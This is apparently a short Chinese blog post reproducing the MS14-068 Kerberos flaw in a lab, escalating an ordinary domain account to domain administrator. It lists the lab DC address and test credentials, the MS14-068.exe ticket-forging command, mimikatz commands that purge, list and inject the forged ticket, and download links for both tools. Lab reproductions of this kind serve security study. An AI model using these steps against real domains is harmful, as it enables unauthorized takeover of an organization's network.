[横向移动]ms14-068 复现

[横向移动]ms14-068 复现

该漏洞允许攻击者将未经授权的域用户账户的权限,提权到域管理员的权限。

DC 192.168.137.145
域账户 Add1 Admin@11

伪造证书

  • 访问DC的c盘 被拒绝 ?! 呜呜呜 原来小小域账户竟是我自己

  • 伪造

    MS14-068.exe -u <userName>@<domainName> -p <clearPassword> -s <userSid> -d <domainControlerAddr>

  • mimikatz

    mimikatz # kerberos::purge          //清空当前凭证
mimikatz # kerberos::list           //查看当前机器凭证
mimikatz # kerberos::ptc 票据文件    //将上一步生成的票据注入到内存中

    票据文件 在MS14.068.exe的目录下

  • 连接到DC

工具下载

mimikatz:https://github.com/gentilkiwi/mimikatz/
MS14-068:https://github.com/abatchy17/WindowsExploits
posted @ 2021-01-12 01:40  Ky1226  阅读(155)  评论(0)    收藏  举报